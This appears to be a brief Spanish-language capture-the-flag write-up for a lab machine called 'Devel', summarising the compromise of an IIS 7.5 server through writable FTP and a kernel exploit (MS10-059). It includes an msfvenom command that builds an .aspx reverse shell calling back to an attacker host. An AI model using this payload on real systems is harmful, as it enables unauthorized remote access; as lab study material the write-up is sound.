Devel

Resumen de la resolución

• Máquina con servicio FTP expuesto con permisos de escritura

• Creación de código malicioso .aspx con MSFVenom para ejecutarlo en un servidor web Microsoft IIS 7.5

• Escalada de privilegios con Kernel Exploit MS10-059 (Chimichurri)

Habilidades adquiridas

• Al subir un binario por FTP se debe usar el comando bin para que sea interpretado como tal

GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合GitHub

Repositorio WIndows Kernel Exploits

Comandos y herramientas destacables

• Búsqueda recursiva desde Windows cmd

where /r c:\ iisstart.htm

• Reverse Shell aspx con MSFVenom

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f aspx > exploit.aspx

Walkthrough en YouTube:

Pendiente